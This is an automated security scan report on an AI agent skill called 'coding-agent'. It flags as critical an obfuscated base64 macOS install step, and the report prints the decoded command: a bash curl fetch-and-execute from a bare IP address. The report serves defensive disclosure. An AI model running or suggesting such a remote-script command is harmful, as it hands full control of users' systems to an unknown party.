Trust Assessment
coding-agent received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated remote script execution during installation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated remote script execution during installation The skill instructs users to execute a base64-encoded command for MacOS installation. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`, which downloads and executes an arbitrary script from an untrusted IP address. This allows for complete compromise of the user's system through arbitrary code execution, representing a severe command injection and supply chain risk. Remove the malicious and obfuscated installation command. Provide a secure, verifiable installation method, such as a package from a trusted repository, or instruct the user to manually inspect and execute scripts from trusted sources only. Avoid direct execution of remote scripts, especially from arbitrary IP addresses. | LLM | SKILL.md:11 |
Scan History
Embed Code
[](https://skillshield.io/report/2979a8fc73c870a4)
Powered by SkillShield